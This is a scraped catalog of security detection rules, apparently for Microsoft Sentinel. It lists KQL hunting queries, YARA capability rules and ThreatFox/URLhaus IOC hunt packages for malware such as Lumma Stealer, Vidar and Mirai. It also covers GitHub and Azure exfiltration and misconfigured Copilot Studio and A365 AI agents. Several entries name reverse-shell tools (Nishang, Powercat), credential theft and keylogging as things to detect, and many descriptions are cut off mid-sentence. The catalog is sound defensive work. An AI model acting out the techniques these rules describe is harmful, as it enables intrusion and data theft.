DeviceProcessEvents
Microsoft has observed Bazacall using a renamed version of Rclone for data exfiltration.
RunDLL Suspicious Network Connection
kql medium
DeviceNetworkEvents
During the chain of events from Bazacall to Bazaloader, RunDLL makes several network connections, including to command and control (C2) infrastructure. The command line for these connections contains
Stolen Images Execution
kql medium
DeviceProcessEvents
The "Stolen Images" Bazarloader campaign uses fake copyright infingement contact form emails and malicious files pretending to contain "stolen images" to trick users into downloading the malware.
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 103 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 7 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with Unknown malware
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 2 IOCs associated with Lumma Stealer
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 6 IOCs associated with Nanocore RAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
DnsEvents
Quasar RAT is
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data, including passwords and browser cookies, by establishing covert communication with command-and-control servers. It typically arrives via phishing emails containing malicious links or compromised websites that deploy the malware through exploit kits or malicious attachments. SOC analysts should monitor for lateral movement indicators, unusual outbound traffic patterns
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 16 IOCs associated with Vidar
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 47 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
ClearFake is a malware family that primarily functions as a data exfiltration tool, leveraging command-and-control (C2) communication to
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mozi malware family is a downloader that establishes command-and-control (C2) communication to exfiltrate data and deploy additional payloads. It typically arrives via phishing emails or malicious websites leveraging
Zip-Doc - Creation of JPG Payload File
kql medium
DeviceImageLoadEvents
In the campaign where Bazarloader is delivered via emails containing pw protected zip attachments, regsvr32.exe is used to launch a malicious payload that is disguised as a JPG file.
Zip-Doc - Word Launching MSHTA
kql medium
DeviceProcessEvents
The pw protected zip attachment -> Word doc delivery method of Bazarloader utilizes Word to create an .hta file and launch it via MSHTA to connect to a malicious domain and pull down the Bazarloader p
ASR rules categorized detection graph
kql medium
DeviceEvents
This query offers daily categorization of ASR rules, helping SOC analysts monitor specific categories like office-related activities or WMI among the 16 rules. It aids in tracking detection rates and
Cross-service Azure Data Explorer queries
kql medium
T1567
'Under specific circumstances, executing KQL queries can exfiltrate information like access tokens, regarding external data functions like adx(). This query tries to list executed KQL queries that use
Cross workspace query anomolies
kql medium
T1530T1213T1020
'This hunting query looks for increases in the number of workspaces queried by a user.'
CryptoPP a_exp_b_mod_c
yara low
CryptoPP a_exp_b_mod_c
CryptoPP modulo
yara low
CryptoPP modulo
FGint Base10StringToGInt
yara low
FGint Base10StringToGInt
FGint FGIntDivMod
yara low
FGint FGIntDivMod
FGint FGIntDestroy
yara low
FGint FGIntDestroy
FGint FGIntModExp
yara low
FGint FGIntModExp
FGint MontgomeryModExp
yara low
FGint MontgomeryModExp
FGint MulByInt
yara low
FGint MulByInt
GitHub First Time Repo Delete
kql medium
T1485
'This hunting query identifies GitHub activites its the first time a user deleted a repo that may be a sign of compromise.'
T1136
'This hunting query identifies Accounts that are new or inactive and have accessed or used GitHub that may be a sign of compromise.'
GitHub Mass Deletion of repos or projects
kql medium
T1485
'This hunting query identifies GitHub activites where there are a large number of deletions that may be a sign of compromise.'
GitHub OAuth App Restrictions Disabled
kql medium
T1505T1562
'This hunting query identifies GitHub OAuth Apps that have restrictions disabled that may be a sign of compromise. Attacker will want to disable such security tools in order to go undetected. '
GitHub Repo Clone - Time Series Anomly
kql medium
T1213
'Attacker can exfiltrate data from your GitHub repository by cloning it. This hunting query tracks clone activities for each repository, allowing quick identification of anomalies/excessive clones to
GitHub Repo switched from private to public
kql medium
T1213
Adversaries may exploit GitHub's public access to exfiltrate sensitive data or distribute malicious code by converting private repositories to public, leveraging the platform's visibility for covert operations. SOC teams should proactively
GitHub Update Permissions
kql medium
T1098T1562
'This hunting query identifies GitHub activites where permissions are updated that may be a sign of compromise.'
T1098T1078
'This hunting query identifies Accounts in GitHub that have granted access to another account which then grants access to yet another account that may be a sign of compromise.'
Looks for MD5 API
yara low
Looks for MD5 API
Look for MD5 constants
yara low
Look for MD5 constants
Miracl crt
yara low
Miracl crt
Miracl powmod
yara low
Miracl powmod
Multiple large queries made by user
kql medium
T1030
'This hunting query looks for users who are running multiple queries that return either a very large amount of data or the maximum amount allowed by the query method.'
New client running queries
kql medium
T1530T1213T1020
'This hunting query looks for clients running queries that have not previously been seen running queries.'
New ServicePrincipal running queries
kql medium
T1530T1213T1020
'This hunting query looks for new Service Principals running queries that have not previously been seen running queries.'
New users calling sensitive Watchlist
kql medium
T1530T1213
'This hunting query looks for users who have run queries calling a watchlist template relating to sensitive data that have not previously been seen calling these watchlists.'
New users running queries
kql medium
T1530T1213
'This hunting query looks for users who have run queries that have not previously been seen running queries.'
Query data volume anomolies
kql medium
T1030
'This hunting query looks for anomalously large LA queries by users.'
Query looking for secrets
kql medium
T1530T1213
AuditLogsSecurityEventSigninLogs
'This hunting query looks for queries that appear to be looking for secrets or passwords in tables.'
The RC6_Constants rule detects binaries containing RC6 encryption constants, which may indicate malicious activity leveraging the RC6 cipher.
Look for RIPEMD-160 constants
yara low
Look for RIPEMD-160 constants
Look for SHA1 constants
yara low
Look for SHA1 constants
Look for SHA2/BLAKE2/Argon2 IVs
yara low
Look for SHA2/BLAKE2/Argon2 IVs
Look for SHA384/SHA512 constants
yara low
Look for SHA384/SHA512 constants
Look for TEA Encryption
yara low
Look for TEA Encryption
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Kimwolf
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for large-scale DDoS attacks. It typically arrives via network exploitation, leveraging un
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 77 IOCs associated with ClearFake
ThreatFox: FAKEUPDATES IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with FAKEUPDATES
ThreatFox: KongTuke IOCs
ioc-hunt high
DeviceFileEventsDnsEvents
The KongTuke malware is a data exfiltration tool that establishes
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 36 IOCs associated with Unknown malware
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents
The Havoc malware family is designed for data exfiltration and persistence, often leveraging encrypted communication channels to steal sensitive
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 20 IOCs associated with Lumma Stealer
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with Quasar RAT
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames,
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Vidar is a data exfiltration malware
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The "32-bit" malware
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 38 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as Mozi
User returning more data than daily average
kql medium
T1030
'This hunting query looks for users whose total returned data that is significantly above their average.'
User running multiple queries that fail
kql medium
T1020
'This hunting query looks for users who have multiple failed queries in a short space of time.'
Look for WhirlPool constants
yara low
Look for WhirlPool constants
T1001.002
CommonSecurityLog
'Threat actors can use JPEG files to hide malware, or other malicious code from inspection. This query looks for the downloading of abnormally large JPEG files from a source where large JPEG files hav
Looks for advapi API functions
yara low
Looks for advapi API functions
Azure CloudShell Usage
kql medium
T1059
AzureActivity
'This query look for users starting an Azure CloudShell session and summarizes the Azure Activity from that user account during that timeframe (by default 1 hour). This can be used to help identify ab
Azure Storage File Create, Access, Delete
kql medium
T1537
'This hunting query will identify where a file is uploaded to Azure File or Blob storage and is then accessed once before being deleted. This activity may be indicative of exfiltration activity.'
Azure Storage File Create and Delete
kql medium
T1020T1537
'This hunting query will try to identify instances where a file us uploaded to file storage and then deleted within a given threshold. By default the query will find instances where a file is uploaded
Azure Storage file upload from VPS Providers
kql medium
T1570
'Looks for file uploads actions to Azure File and Blob Storage from known VPS provider network ranges. This is not an exhaustive list of VPS provider ranges but covers some of the most prevalent provi
Azure Storage Mass File Deletion
kql medium
T1485
'Detect mass file deletion events within Azure File and Blob storage. deleteWindow controls the period of time the deletions must occur in, whilst the deleteThreshold controls how many files must be d
Looks for big numbers 20:sized
yara low
Looks for big numbers 20:sized
Looks for big numbers 32:sized
yara low
Detects 32-bit numeric values that may indicate obfuscation
Looks for big numbers 48:sized
yara low
Looks for big numbers 48:sized
Looks for big numbers 64:sized
yara low
Looks for big numbers 64:sized
Looks for big numbers 128:sized
yara low
Looks for big numbers 128:sized
Looks for big numbers 256:sized
yara low
Looks for big numbers 256:sized
Look for Blowfish constants
yara low
Look for Blowfish constants
AzureDiagnostics
'Discover all critical ports from a list having rules like 'Any' for sourceIp, which means that they are opened to everyone. Critial ports should not be opened to everyone, and should be filtered.'
Consent to Application discovery
kql medium
T1136
AuditLogs
'This query looks at the last 14 days for "Consent to application" operation by a user/app which could potentially mean unauthorized access. Additional context is added from AuditLogs based on Corrlea
Look for CRC16 table
yara low
Look for CRC16 table
Look for CRC32 [poly]
yara low
Look for CRC32 [poly]
Look for CRC32 table
yara low
Look for CRC32 table
CRC32 table lookup
yara low
CRC32 table lookup
Look for CRC32b [poly]
yara low
Look for CRC32b [poly]
Look for CRC32c (Castagnoli) [poly]
yara low
Look for CRC32c (Castagnoli) [poly]
Looks for crypt32 CryptBinaryToStringA function
T1595T1530
"This Kusto (KQL) hunting query detects blob-enumeration or file-spraying behaviour in Azure Storage by: - Aggregating requests into time-bound sessions with row_window_session(). - Defining a "us
Look for ElfHash
yara low
Look for ElfHash
Look for FlyUtils.CnDES Decrypt ECB function
Look for FlyUtils.CnDES Encrypt ECB function
T1136
'This hunting query identifies a user that add/invite a member to the organization for the first time. This technique can be leveraged by attackers to add stealth account access to the organization.'
T1078.004
AuditLogs
'This query will look for events where guest user was invited but has not accepted/redeemed invite for unusually longer period. Any invites not redeemed for longer period of time can be misused and
T1547.006
DeviceProcessEvents
'Detects observed Visual Studio Code (VS Code) extension installation activity on a user's system within the query time range. Note: This query does not return a complete per-user inventory of instal
T1484
CloudAppEvents
"This query searches for any action type with high frequency that involves adding, modifying, or removing something in cloud app policies. It sees where the properties are modified such that the old v
T1190
AzureDiagnostics
'This hunting query looks in Azure Web Application Firewall data to find possible SpringShell Exploitation Attempt (CVE-2022-22965). The Spring Framework is one of the most widely used lightweight op
List of primes [char]
yara low
List of primes [char]
List of primes [long]
yara low
List of primes [long]
Rare Audit activity initiated by App
kql medium
T1136
AuditLogs
'Compares the current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by Azure Apps and automated approv
Rare Audit activity initiated by User
kql medium
T1136
AuditLogs
'Compares current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by specific users.'
Storage File Seen on Endpoint
kql medium
T1570
DeviceFileEvents
'Finds instances where a file uploaded to blob or file storage and it is seen on an endpoint by Microsoft Defender XDR.'
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with Kimwolf
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 112 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with KongTuke
ThreatFox: OtterCookie IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with OtterCookie
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 44 IOCs associated with Unknown malware
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Cobalt Strike
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Remcos
ThreatFox: SmartLoader IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
SmartLoader is a multi-stage loader malware that establishes persistence and exfiltrates data by dropping additional payloads and maintaining command-and-control communication
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
StrelaStealer is a credential-stealing malware that exfiltrates
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a data exfiltration malware that steals credentials and sensitive information, often using encrypted channels to transmit stolen data to command-and-control servers.
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 37 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 24 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 24 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 14 malicious URLs tagged as Mozi
T1528
SigninLogs
'This hunting query will try to identify the user account used to perform a file upload to blob storage. This query can be used to match all file upload events, or filtering can be applied on filename
T1098T1078T1496
AuditLogs
'Identifies when a new user is granted access and any subsequent audit related activity. This can help you identify rogue or malicious user behavior.'
T1078
SigninLogs
'Detects when a user has successfully authenticated to another Microsoft Entra ID tenant with an identity in your organization's tenant. Ref: https://docs.microsoft.com/azure/active-directory/fundam
Account Added to Privileged PIM Group
kql medium
T1098T1548
AuditLogs
'Identifies accounts that have been added to a PIM managed privileged group'
Account MFA Modifications
kql medium
T1556.006
AuditLogs
'Identifies modifications to user's MFA settings. An attacker could use access to modify MFA settings to bypass MFA requirements or maintain persistence.
Approved Access Packages Details
kql medium
T1556
AuditLogs
This query shows details about all approved Entra ID Governance Access Packages assignments. The results include the time the request was created and approved along with the justification text provide
BitLocker Key Retrieval
kql medium
T1555
AuditLogsSecurityAlert
'Looks for users retrieving BitLocker keys. Enriches these logs with a summary of alerts associated with the user accessing the keys. Use this query to start looking for anomalous patterns of key retr
Crash dump disabled on host (ASIM Version)
kql medium
T1070
imRegistry
'This detection looks the prevention of crash dumps being created. This can be used to limit reporting by malware, look for suspicious processes setting this registry key.'
Steal IE 7 credential
yara low
Steal IE 7 credential
imProcessCreate
'breakdown of scripts running in the environment'
imProcessCreate
'Entropy calculation used to help identify Hosts where they have a high variety of processes(a high entropy process list on a given Host over time). This helps us identify rare processes on a given Ho
imProcessCreate
'Finds attempts to list users or groups using the built-in Windows 'net' tool '
T1114
imProcessCreate
'This hunting query looks for hosts exporting a mailbox from an on-prem Exchange server, followed by that same host removing the export within a short time window. This pattern has been observed by at
T1011
imProcessCreate
'Invoke-PowerShellTcpOneLine is a PowerShell script to create a simple and small reverse shell. It can be abused by attackers to exfiltrate data. This query looks for command line activity similar to
ldpreload
yara low
YARA rule: ldpreload
APC queue tasks migration
yara low
APC queue tasks migration
This rule checks MySQL database presence
T1011
imProcessCreate
'Looks for Base64-encoded commands associated with the Nishang reverse TCP shell. Ref: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1'
T1098
AuditLogs
'This hunting query identifies updates to the RequiredResourceAccess property of an OAuth application. This property specifies resources that an application requires access to and the set of OAuth per
T1011
imProcessCreate
'Powercat is a PowerShell implementation of netcat. Whilst it can be used as a legitimate administrative tool it can be abused by attackers to exfiltrate data. This query looks for command line activi
imProcessCreate
'Finds PowerShell execution events that could involve a download'
The 'rat_rdp
The 'rat_telnet' YARA rule detects the presence of a Remote Administration
Remote Administration toolkit VNC
yara low
Remote Administration toolkit VNC
Remote Administration toolkit using webcam
T1218.011
imProcessCreate
'This detection uses Normalized Process Events to hunt Signed Binary Proxy Execution: Rundll32 activities'
Sniff Lan network traffic
yara low
Sniff Lan network traffic
T1072
imProcessCreate
'Beyond your internal software management systems, it is possible you may not have visibility into your entire footprint of SolarWinds installations. This is intended to help use process exection inf
Malware can spread east-west file
yara low
Malware can spread east-west file
Malware can spread east-west using share drive
Match Windows Http API call
yara low
Match Windows Http API call
Match Windows Inet API call
yara low
Match Windows Inet API call
Match Windows Inet API library declaration
Match Winsock 2 API library declaration
T1110
imProcessCreate
'Summarizes uses of uncommon & undocumented commandline switches to create persistence User accounts may be created to achieve persistence on a machine. Read more here: https://attack.mitre.org/wiki/T
T1059T1087T1482T1201T1069T1074
imProcessCreate
Attackers can use Adfind which is administrative tool to gather information about Domain controllers, ADFS Servers. They may also rename executables with other benign tools on the system. Below query
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 113 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 43 IOCs associated with Unknown malware
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Cobalt Strike is a sophisticated malware used for command and control (C2) operations, enabling attackers
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
UrlClickEvents
The Lumma Stealer malware is a data-exfiltration tool that steals sensitive information such as credentials, browser data, and cryptocurrency wallet details. It typically arrives via phishing emails containing malicious URLs or compromised websites that deliver the payload. SOC analysts should monitor for unusual outbound traffic, unexpected process executions, and signs of credential theft or
ThreatFox: MaskGramStealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with MaskGramStealer
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames, passwords, and browser cookies by establishing command-and-control (C2) communication through malicious domains. It
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Vidar malware is a data exfiltration tool that steals credentials and sensitive information via encrypted channels, often leveraging stolen credentials or phishing to maintain persistence. It typically arrives through malicious email attachments, compromised credentials, or exploit kits, using IP:port and URL IOCs to establish command-and
imProcessCreate
'Shows the rarest processes seen running for the first time. (Performs best over longer time ranges - eg 3+ days rather than 24 hours!) These new processes could be benign new programs installed on ho
URLhaus: 118-107-44-190-8080 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 118-107-44-190-8080
URLhaus: 118-107-44-213-8080 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 118-107-44-213-8080
URLhaus: 118-107-44-253-8080 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 118-107-44-253-8080
URLhaus: 144-91-86-92 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as 144-91-86-92
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as 32-bit
URLhaus: 38-76-199-154-8888 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as 38-76-199-154-8888
URLhaus: ascii Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as ascii
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 29 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 13 malicious URLs tagged as Mozi
Affect private profile
yara low
Affect private profile
Create or check mutex
yara low
Create or check mutex
Affect private profile
yara low
Affect private profile
Affect system registries
yara low
Affect system registries
Affect system token
yara low
Affect system token
T1529
imProcessCreate
'This detection uses Normalized Process Events to detect System Shutdown/Reboot (MITRE Technique: T1529)'
AI Agents - MCP Tool Configured
kql medium
T1059
This query identifies Copilot Studio AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because the
T1078T1562
IdentityInfo
This query identifies AI agents whose owners are either disabled or removed from the organization. Orphaned agents without an active owner pose governance and security risks because no one is account
AI Agents - Unpublished Unmodified (30d)
kql medium
This query identifies AI agents that remain unpublished and have not been modified for at least 30 days. While these agents may not pose an immediate security threat, they can create operational inef
Perform crypto currency mining
yara low
Perform crypto currency mining
Inject certificate in store
yara low
Inject certificate in store
T1105
imProcessCreate
'This detection uses Normalized Process Events to hunt Certutil activities'
CloudAppEvents
This query identifies Copilot Studio AI agents that are published and contain actions configured with Author Authentication (maker`s personal credentials) but have not been used or invoked in the last
T1552T1078
This query identifies Copilot Studio AI agents that contain hard-coded credentials in Topics or Actions. Storing credentials in clear text within agent logic creates a security risk because these sec
T1562
This query identifies Copilot Studio AI agents that use HTTP actions to endpoints where Power Platform connectors are available (e.g., graph.microsoft.com, management.azure.com). Using direct HTTP ca
T1071T1040
This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the ri
T1071T1041
This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unau
T1078T1552
Identifies Copilot Studio AI agents with Model Context Protocol (MCP) tools configured using maker credentials. This configuration can create security risks because the tool runs with the maker`s pers
T1078T1190
This query identifies Copilot Studio AI agents without authentication mechanisms. Authentication is an agent-level configuration. Such misconfiguration poses significant security risks because when t
This query identifies Copilot Studio AI agents that are shared broadly-either with the entire organization or configured for multi-tenant access. Such configurations significantly increase the risk of
This query identifies Copilot Studio AI agents that are published and use the maker`s personal credentials in their authentication or integration flows. This configuration introduces security risks b
CloudAppEvents
This query identifies Copilot Studio AI agents that are published but have not been used by any user in the organization for the last 30 days. Dormant agents can create unnecessary exposure and may s
T1499T1562
Advers
T1041
IdentityInfo
This query identifies Copilot Studio AI agents configured to send emails to external mailboxes (outside the organization`s domains). Such configurations can lead to sensitive or internal data being e
Copilot Studio AI Agents - Unused Actions
kql medium
This query identifies Copilot Studio AI agents with classic orchestration that include Actions not referenced in any Topic. While unused Actions may not pose an immediate security risk, they can intr
Steal Firefox credential
yara low
Steal Firefox credential
Steal credential
yara low
Steal credential
Steal VNC credential
yara low
Steal VNC credential
T1071
SecurityAlert
' This hunting query looks for process command line activity related to activity observed by Dev-0056.The command lines this query hunts for are used as part of the threat actor's post exploitation ac
T1204T1102T1567
'This hunting query looks for hosts that have attempted to interact with the Discord CDN. This activity is not normally invoked from the command line and could indicate C2, exfiltration, or malware de
Dynamic DNS
yara low
Dynamic DNS
Escalade priviledges
yara low
Escalade priviledges
T1119
imProcessCreate
'The Exchange Powershell Snapin was loaded on a host, this allows for a Exchange server management via PowerShell. Whilst this is a legitimate administrative tool it is abused by attackers to performs
Run a keylogger
yara low
Run a keylogger
Lookup Geolocation
yara low
Lookup Geolocation
Lookup external IP
yara low
Lookup external IP
Communication using dga
yara low
Communication using dga
Communications use DNS
yara low
Communications use DNS
File downloader/dropper
yara low
File downloader/dropper
Communications over FTP
yara low
Communications over FTP
Communications over HTTP
yara low
Communications over HTTP
Communications over IRC network
yara low
Communications over IRC network
Communications over SSL
yara low
Communications over SSL
Communications over RAW socket
yara low
Communications over RAW socket
Take screenshot
yara low
Take screenshot
Record Audio
yara low
Record Audio
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with Kimwolf
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 107 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with Unknown malware
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 4 IOCs associated with Unknown Stealer
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Remcos
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 66 IOCs associated with StrelaStealer
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with Vidar
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 21 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 30 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 18 malicious URLs tagged as elf
URLhaus: exe Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as exe
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mozi malware family is a backdoor that enables remote command execution and data exfiltration, often used for persistent access and espionage. It typically arrives via phishing emails containing malicious URLs or through compromised websites hosting malicious domains. SOC analysts should monitor for unusual outbound traffic to listed domains, signs of lateral movement,
T1552T1078
IdentityInfo
This query identifies A365 AI agents that contain hard-coded credentials in their tools or actions. Storing credentials in clear text within agent logic creates a security risk because these secrets
T1071T1040
IdentityInfo
This query identifies A365 AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the risk of inte
T1071T1041
IdentityInfo
This query identifies A365 AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unauthorized n
A365 AI Agents - MCP Tool Configured
kql medium
T1059
IdentityInfo
This query identifies A365 AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because they can exec
T1499T1562
IdentityInfo
This query identifies A365 AI agents that have tools configured but they are not mentioned in instructions. This query identifies A365 AI agents that have tools configured but are not mentioned in in
T1078T1562
IdentityInfo
This query identifies A365 AI agents whose owners are either disabled or removed from the organization, and are not blocked. Orphaned agents without an active owner pose governance and security risks
A365 AI Agents - Publicly Shared
kql medium
IdentityInfo
This query identifies A365 AI agents that are shared publicly. Such configurations significantly increase the risk of unauthorized access by unintended users, which could lead to data exposure or misu
T1499T1562
IdentityInfo
This query identifies A365 AI agents that are published but have short or insufficient instructions. Short instructions increase the risk of prompt injection attacks, where malicious input can influe
T1499T1562
IdentityInfo
This query identifies A365 AI agents that are published but lack configured instructions. Missing instructions increase the risk of prompt injection attacks, where malicious input can influence the a
Check if hotfix are applied
yara low
Check if hotfix are applied
T1041T1565
This query identifies Copilot Studio AI agents using generative orchestration to send emails via the Outlook connector where all action input values are populated dynamically by the orchestrator. Th
Create a COM server
yara low
Create a COM server
Create a new process
yara low
Create a new process
Create a windows service
yara low
Create a windows service
Bypass DEP
yara low
Bypass DEP
Disable Task Manager
yara low
Disable Task Manager
Exchange Server Suspicious File Downloads.
kql medium
T1190
'This query looks for messages related to file downloads of suspicious file types on an Exchange Server. This could indicate attempted deployment of webshells. This query uses the Exchange HttpProxy
T1190
W3CIISLog
'This query looks for suspicious request patterns to Exchange servers that fit patterns recently blogged about by PeterJson. This exploitation chain utilises an SSRF vulnerability in Exchange which ev
External User Access Enabled
kql low
T1098T1556
'This alerts when the account setting is changed to allow either external domain access or anonymous access to meetings.'
T1190
W3CIISLog
'Identifies when 30 or more ports are used for a given client IP in 10 minutes occurring on the IIS server. This could be indicative of attempted port scanning or exploit attempt at internet facing we
High count of failed logons by a user
kql medium
T1110
W3CIISLog
